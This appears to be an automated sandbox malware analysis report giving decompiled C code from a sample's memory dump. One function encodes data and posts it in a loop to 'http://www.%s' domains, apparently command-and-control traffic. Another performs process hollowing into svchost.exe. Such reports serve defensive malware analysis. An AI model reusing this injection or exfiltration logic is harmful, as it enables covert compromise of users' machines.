                                                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                                                            			E007B4BA0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				void* _v48;
                                                                                                                                                                                                                                                                            				long _v52;
                                                                                                                                                                                                                                                                            				void* _v56;
                                                                                                                                                                                                                                                                            				char* _v60;
                                                                                                                                                                                                                                                                            				CHAR* _v64;
                                                                                                                                                                                                                                                                            				intOrPtr* _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				int _v76;
                                                                                                                                                                                                                                                                            				void* _v80;
                                                                                                                                                                                                                                                                            				void* _v84;
                                                                                                                                                                                                                                                                            				void* _v88;
                                                                                                                                                                                                                                                                            				void* _v92;
                                                                                                                                                                                                                                                                            				void* _v96;
                                                                                                                                                                                                                                                                            				void* _v100;
                                                                                                                                                                                                                                                                            				void* _v124;
                                                                                                                                                                                                                                                                            				void* _v132;
                                                                                                                                                                                                                                                                            				void* _v136;
                                                                                                                                                                                                                                                                            				void* _v140;
                                                                                                                                                                                                                                                                            				void* _v144;
                                                                                                                                                                                                                                                                            				void* _v148;
                                                                                                                                                                                                                                                                            				void* _v152;
                                                                                                                                                                                                                                                                            				void* _v156;
                                                                                                                                                                                                                                                                            				void* _v160;
                                                                                                                                                                                                                                                                            				char _v420;
                                                                                                                                                                                                                                                                            				CHAR* _v424;
                                                                                                                                                                                                                                                                            				int _v428;
                                                                                                                                                                                                                                                                            				void* _v432;
                                                                                                                                                                                                                                                                            				long _v436;
                                                                                                                                                                                                                                                                            				short _v948;
                                                                                                                                                                                                                                                                            				void* _v952;
                                                                                                                                                                                                                                                                            				void* _v956;
                                                                                                                                                                                                                                                                            				void* _v960;
                                                                                                                                                                                                                                                                            				void* _v964;
                                                                                                                                                                                                                                                                            				long _v968;
                                                                                                                                                                                                                                                                            				void* _t306;
                                                                                                                                                                                                                                                                            				void* _t307;
                                                                                                                                                                                                                                                                            				void* _t308;
                                                                                                                                                                                                                                                                            				int _t312;
                                                                                                                                                                                                                                                                            				int _t318;
                                                                                                                                                                                                                                                                            				long _t328;
                                                                                                                                                                                                                                                                            				void* _t333;
                                                                                                                                                                                                                                                                            				void* _t351;
                                                                                                                                                                                                                                                                            				long _t358;
                                                                                                                                                                                                                                                                            				void* _t637;
                                                                                                                                                                                                                                                                            				void* _t638;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                            				_v8 = _a4;
                                                                                                                                                                                                                                                                            				if(_v8 == 0) {
                                                                                                                                                                                                                                                                            					L83:
                                                                                                                                                                                                                                                                            					__imp__CoUninitialize(); // executed
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					E007B7B70( &_v36, _v8, 0x1c);
                                                                                                                                                                                                                                                                            					_t638 = _t637 + 0xc;
                                                                                                                                                                                                                                                                            					SetEvent( *(_v8 + 0x10));
                                                                                                                                                                                                                                                                            					_v40 = 0xea60;
                                                                                                                                                                                                                                                                            					_v44 = _v28;
                                                                                                                                                                                                                                                                            					while(_v44 <= _v24 && (( *(_v12 + 0x28) & 0x000000ff) != 0 || WaitForSingleObject( *(_v12 + 0x24), 0xa) != 0)) {
                                                                                                                                                                                                                                                                            						_v64 = _v44 * 0x28 + _v36;
                                                                                                                                                                                                                                                                            						_v52 = 0x100000;
                                                                                                                                                                                                                                                                            						_t306 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            						_v48 = _t306;
                                                                                                                                                                                                                                                                            						_t307 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            						_v56 = _t307;
                                                                                                                                                                                                                                                                            						_t308 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            						_v60 = _t308;
                                                                                                                                                                                                                                                                            						if(_v48 == 0 || _v56 == 0 || _v60 == 0) {
                                                                                                                                                                                                                                                                            							L82:
                                                                                                                                                                                                                                                                            							_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v68 = _v48;
                                                                                                                                                                                                                                                                            							_v80 = 0;
                                                                                                                                                                                                                                                                            							while(_v80 < 0x100) {
                                                                                                                                                                                                                                                                            								_v80 = _v80 + 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                            							if( *0x7c18a4 == 2 &&  *((intOrPtr*)(_v16 + 0x453)) > 0 &&  *((intOrPtr*)(_v16 + 0x453)) < 0x100000 - _v72 &&  *((intOrPtr*)(_v16 + 0x457)) != 0) {
                                                                                                                                                                                                                                                                            								 *_v68 =  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                            								_v68 = _v68 + 4;
                                                                                                                                                                                                                                                                            								E007B7B70(_v68,  *((intOrPtr*)(_v16 + 0x457)),  *((intOrPtr*)(_v16 + 0x453)));
                                                                                                                                                                                                                                                                            								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                            								_v68 = _v68 +  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                            							_t312 = E007B8370(_v48, _v72, _v56, 0x100000); // executed
                                                                                                                                                                                                                                                                            							_t638 = _t638 + 0x10;
                                                                                                                                                                                                                                                                            							_v76 = _t312;
                                                                                                                                                                                                                                                                            							if(_v76 <= 0) {
                                                                                                                                                                                                                                                                            								L81:
                                                                                                                                                                                                                                                                            								VirtualFree(_v48, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								VirtualFree(_v56, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								VirtualFree(_v60, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								goto L82;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v424 = "http://www.%s";
                                                                                                                                                                                                                                                                            								_t318 = lstrlenA(_v64);
                                                                                                                                                                                                                                                                            								if(_t318 + lstrlenA(_v424) >= 0x100) {
                                                                                                                                                                                                                                                                            									goto L81;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								wsprintfA( &_v420, _v424, _v64);
                                                                                                                                                                                                                                                                            								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                            								_v428 = 0x100000;
                                                                                                                                                                                                                                                                            								if(CryptBinaryToStringA(_v56, _v76, 0x40000001, _v60,  &_v428) == 0) {
                                                                                                                                                                                                                                                                            									goto L81;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v956 = 0;
                                                                                                                                                                                                                                                                            								_v432 = 0;
                                                                                                                                                                                                                                                                            								MultiByteToWideChar(1, 1,  &_v420, 0xffffffff,  &_v948, 0x100);
                                                                                                                                                                                                                                                                            								_v952 = 0;
                                                                                                                                                                                                                                                                            								_t328 = E007B17D0( &_v420,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                            								_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                            								_v436 = _t328;
                                                                                                                                                                                                                                                                            								if(_v436 <= 0) {
                                                                                                                                                                                                                                                                            									L79:
                                                                                                                                                                                                                                                                            									if(_v956 != 0) {
                                                                                                                                                                                                                                                                            										VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L81;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(_v436 < 0x100 || _v952 >= 0x1f4) {
                                                                                                                                                                                                                                                                            									if( *0x7c18a4 != 1) {
                                                                                                                                                                                                                                                                            										goto L70;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            									_v956 = 0;
                                                                                                                                                                                                                                                                            									_v432 = 0;
                                                                                                                                                                                                                                                                            									_v960 = 0;
                                                                                                                                                                                                                                                                            									while(_v960 < 4) {
                                                                                                                                                                                                                                                                            										_t358 = E007B17D0(_v428,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                            										_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                            										_v436 = _t358;
                                                                                                                                                                                                                                                                            										if(_v436 > 0x100 || _v952 < 0x1f4) {
                                                                                                                                                                                                                                                                            											goto L70;
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											_v960 = _v960 + 1;
                                                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L70;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									L70:
                                                                                                                                                                                                                                                                            									if(_v436 > 0) {
                                                                                                                                                                                                                                                                            										EnterCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                            										if( *(_v12 + 4) != 0) {
                                                                                                                                                                                                                                                                            											_v968 =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                            											_t333 = VirtualAlloc(0, _v968, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            											_v964 = _t333;
                                                                                                                                                                                                                                                                            											if(_v964 != 0) {
                                                                                                                                                                                                                                                                            												if(GetTickCount() % 2 != 0) {
                                                                                                                                                                                                                                                                            													E007B7B70(_v964, _v956, _v436);
                                                                                                                                                                                                                                                                            													E007B7B70(_v964 + _v436,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                            													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                            													E007B7B70(_v964,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                            													E007B7B70(_v964 +  *(_v12 + 8), _v956, _v436);
                                                                                                                                                                                                                                                                            													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												 *(_v12 + 8) =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                            												VirtualFree( *(_v12 + 4), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            												 *(_v12 + 4) = _v964;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											_t351 = VirtualAlloc(0, _v436, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            											 *(_v12 + 4) = _t351;
                                                                                                                                                                                                                                                                            											E007B7B70( *(_v12 + 4), _v956, _v436);
                                                                                                                                                                                                                                                                            											_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                            											 *(_v12 + 8) = _v436;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										LeaveCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L79;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L83;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}
























































                                                                                                                                                                                                                                                                            0x007b4bac
                                                                                                                                                                                                                                                                            0x007b4bb5
                                                                                                                                                                                                                                                                            0x007b4bbc
                                                                                                                                                                                                                                                                            0x007b56f0
                                                                                                                                                                                                                                                                            0x007b56f0
                                                                                                                                                                                                                                                                            0x007b56fc
                                                                                                                                                                                                                                                                            0x007b4bc2
                                                                                                                                                                                                                                                                            0x007b4bcc
                                                                                                                                                                                                                                                                            0x007b4bd1
                                                                                                                                                                                                                                                                            0x007b4bdb
                                                                                                                                                                                                                                                                            0x007b4be1
                                                                                                                                                                                                                                                                            0x007b4beb
                                                                                                                                                                                                                                                                            0x007b4bf9
                                                                                                                                                                                                                                                                            0x007b4c31
                                                                                                                                                                                                                                                                            0x007b4c34
                                                                                                                                                                                                                                                                            0x007b4c49
                                                                                                                                                                                                                                                                            0x007b4c4f
                                                                                                                                                                                                                                                                            0x007b4c60
                                                                                                                                                                                                                                                                            0x007b4c66
                                                                                                                                                                                                                                                                            0x007b4c77
                                                                                                                                                                                                                                                                            0x007b4c7d
                                                                                                                                                                                                                                                                            0x007b4c84
                                                                                                                                                                                                                                                                            0x007b56eb
                                                                                                                                                                                                                                                                            0x007b4bf6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b4c9e
                                                                                                                                                                                                                                                                            0x007b4ca1
                                                                                                                                                                                                                                                                            0x007b4ca4
                                                                                                                                                                                                                                                                            0x007b4cb6
                                                                                                                                                                                                                                                                            0x007b4cb3
                                                                                                                                                                                                                                                                            0x007b4cb3
                                                                                                                                                                                                                                                                            0x007b52a8
                                                                                                                                                                                                                                                                            0x007b52b2
                                                                                                                                                                                                                                                                            0x007b52eb
                                                                                                                                                                                                                                                                            0x007b52f3
                                                                                                                                                                                                                                                                            0x007b530e
                                                                                                                                                                                                                                                                            0x007b5313
                                                                                                                                                                                                                                                                            0x007b5322
                                                                                                                                                                                                                                                                            0x007b5322
                                                                                                                                                                                                                                                                            0x007b532b
                                                                                                                                                                                                                                                                            0x007b533f
                                                                                                                                                                                                                                                                            0x007b5344
                                                                                                                                                                                                                                                                            0x007b5347
                                                                                                                                                                                                                                                                            0x007b534e
                                                                                                                                                                                                                                                                            0x007b56b8
                                                                                                                                                                                                                                                                            0x007b56c3
                                                                                                                                                                                                                                                                            0x007b56d4
                                                                                                                                                                                                                                                                            0x007b56e5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b5354
                                                                                                                                                                                                                                                                            0x007b5354
                                                                                                                                                                                                                                                                            0x007b5362
                                                                                                                                                                                                                                                                            0x007b537f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b5397
                                                                                                                                                                                                                                                                            0x007b539d
                                                                                                                                                                                                                                                                            0x007b53a0
                                                                                                                                                                                                                                                                            0x007b53ca
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b53d0
                                                                                                                                                                                                                                                                            0x007b53da
                                                                                                                                                                                                                                                                            0x007b53fd
                                                                                                                                                                                                                                                                            0x007b5403
                                                                                                                                                                                                                                                                            0x007b5439
                                                                                                                                                                                                                                                                            0x007b543e
                                                                                                                                                                                                                                                                            0x007b5441
                                                                                                                                                                                                                                                                            0x007b544e
                                                                                                                                                                                                                                                                            0x007b569b
                                                                                                                                                                                                                                                                            0x007b56a2
                                                                                                                                                                                                                                                                            0x007b56b2
                                                                                                                                                                                                                                                                            0x007b56b2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b56a2
                                                                                                                                                                                                                                                                            0x007b545e
                                                                                                                                                                                                                                                                            0x007b5477
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b548b
                                                                                                                                                                                                                                                                            0x007b5491
                                                                                                                                                                                                                                                                            0x007b549b
                                                                                                                                                                                                                                                                            0x007b54a5
                                                                                                                                                                                                                                                                            0x007b54c0
                                                                                                                                                                                                                                                                            0x007b54f5
                                                                                                                                                                                                                                                                            0x007b54fa
                                                                                                                                                                                                                                                                            0x007b54fd
                                                                                                                                                                                                                                                                            0x007b550d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b551d
                                                                                                                                                                                                                                                                            0x007b54ba
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b54ba
                                                                                                                                                                                                                                                                            0x007b550d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b551f
                                                                                                                                                                                                                                                                            0x007b551f
                                                                                                                                                                                                                                                                            0x007b5526
                                                                                                                                                                                                                                                                            0x007b5533
                                                                                                                                                                                                                                                                            0x007b5540
                                                                                                                                                                                                                                                                            0x007b5598
                                                                                                                                                                                                                                                                            0x007b55ae
                                                                                                                                                                                                                                                                            0x007b55b4
                                                                                                                                                                                                                                                                            0x007b55c1
                                                                                                                                                                                                                                                                            0x007b55d8
                                                                                                                                                                                                                                                                            0x007b5631
                                                                                                                                                                                                                                                                            0x007b5654
                                                                                                                                                                                                                                                                            0x007b5659
                                                                                                                                                                                                                                                                            0x007b55da
                                                                                                                                                                                                                                                                            0x007b55ef
                                                                                                                                                                                                                                                                            0x007b5612
                                                                                                                                                                                                                                                                            0x007b5617
                                                                                                                                                                                                                                                                            0x007b5617
                                                                                                                                                                                                                                                                            0x007b566b
                                                                                                                                                                                                                                                                            0x007b567c
                                                                                                                                                                                                                                                                            0x007b568b
                                                                                                                                                                                                                                                                            0x007b568b
                                                                                                                                                                                                                                                                            0x007b5542
                                                                                                                                                                                                                                                                            0x007b5552
                                                                                                                                                                                                                                                                            0x007b555b
                                                                                                                                                                                                                                                                            0x007b5573
                                                                                                                                                                                                                                                                            0x007b5578
                                                                                                                                                                                                                                                                            0x007b5584
                                                                                                                                                                                                                                                                            0x007b5584
                                                                                                                                                                                                                                                                            0x007b5695
                                                                                                                                                                                                                                                                            0x007b5695
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b5526
                                                                                                                                                                                                                                                                            0x007b545e
                                                                                                                                                                                                                                                                            0x007b534e
                                                                                                                                                                                                                                                                            0x007b4c84
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b4bf9

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 007B4BAC
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 007B4BDB
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 007B4C19
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 007B4C49
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 007B4C60
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 007B4C77
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 007B56F0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
                                                                                                                                                                                                                                                                            • String ID: $`$http://www.%s$pigalicapi
                                                                                                                                                                                                                                                                            • API String ID: 1834614700-967124566
                                                                                                                                                                                                                                                                            • Opcode ID: d1a5efc6a580325176772302e882a61ecb0391f96e3b17f2cb4abd3c1120ddb7
                                                                                                                                                                                                                                                                            • Instruction ID: b368fdc1c8ce9bcad3e1c77f3fbc7c2768b36c371ee75fa3eac3101f1375edaf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1a5efc6a580325176772302e882a61ecb0391f96e3b17f2cb4abd3c1120ddb7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B62B0B1D00218EFDB14DB94DC85FEDB7B8BF49705F088199F60567282E7789A85CB60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B20B0(intOrPtr _a4, signed char _a8, CHAR* _a12) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                                                            				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                                            				intOrPtr _v1016;
                                                                                                                                                                                                                                                                            				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                                            				intOrPtr _v1096;
                                                                                                                                                                                                                                                                            				void _v1100;
                                                                                                                                                                                                                                                                            				signed int _v1104;
                                                                                                                                                                                                                                                                            				CHAR* _t121;
                                                                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                                                                            				int _t130;
                                                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                                                            				int _t140;
                                                                                                                                                                                                                                                                            				int _t143;
                                                                                                                                                                                                                                                                            				int _t145;
                                                                                                                                                                                                                                                                            				int _t148;
                                                                                                                                                                                                                                                                            				void* _t180;
                                                                                                                                                                                                                                                                            				void* _t263;
                                                                                                                                                                                                                                                                            				void* _t265;
                                                                                                                                                                                                                                                                            				void* _t266;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a4 == 0) {
                                                                                                                                                                                                                                                                            					L26:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                                            				_t121 = lstrcatA( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                                            				if(_a12 != 0) {
                                                                                                                                                                                                                                                                            					lstrcatA( &_v276, " ");
                                                                                                                                                                                                                                                                            					_t121 = lstrcatA( &_v276, _a12);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E007B7D20(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                                            				E007B7D20( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                                            				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                                            				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                                            				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                            				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                            				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                                            				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                            				_v12 = _t128;
                                                                                                                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                                                                                                                            					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                                            					if(_t130 != 0) {
                                                                                                                                                                                                                                                                            						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                            						_v1100 = _t132;
                                                                                                                                                                                                                                                                            						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                            							L10:
                                                                                                                                                                                                                                                                            							E007B7B70(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                                            							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                                            							_v1104 = 0;
                                                                                                                                                                                                                                                                            							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                            								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            									E007B7B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                            									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									E007B7B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                            									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							E007B26D0(_v12, _v1100);
                                                                                                                                                                                                                                                                            							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                                            							if(_t140 != 0) {
                                                                                                                                                                                                                                                                            								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                                            								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                            								if(_t143 != 0) {
                                                                                                                                                                                                                                                                            									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                                            									if(_t145 != 0) {
                                                                                                                                                                                                                                                                            										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                                            										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                            										if(_t148 == 0) {
                                                                                                                                                                                                                                                                            											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                                            										return _v1012.hProcess;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                            									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            									return 0;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                            								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                            							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t180 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40); // executed
                                                                                                                                                                                                                                                                            						_v1100 = _t180;
                                                                                                                                                                                                                                                                            						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                            							goto L10;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            						CloseHandle(_v1012);
                                                                                                                                                                                                                                                                            						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                                                            0x007b20bd
                                                                                                                                                                                                                                                                            0x007b2502
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2502
                                                                                                                                                                                                                                                                            0x007b20d4
                                                                                                                                                                                                                                                                            0x007b20e6
                                                                                                                                                                                                                                                                            0x007b20f0
                                                                                                                                                                                                                                                                            0x007b20fe
                                                                                                                                                                                                                                                                            0x007b210f
                                                                                                                                                                                                                                                                            0x007b210f
                                                                                                                                                                                                                                                                            0x007b2120
                                                                                                                                                                                                                                                                            0x007b2133
                                                                                                                                                                                                                                                                            0x007b2138
                                                                                                                                                                                                                                                                            0x007b213b
                                                                                                                                                                                                                                                                            0x007b214e
                                                                                                                                                                                                                                                                            0x007b2168
                                                                                                                                                                                                                                                                            0x007b2177
                                                                                                                                                                                                                                                                            0x007b2187
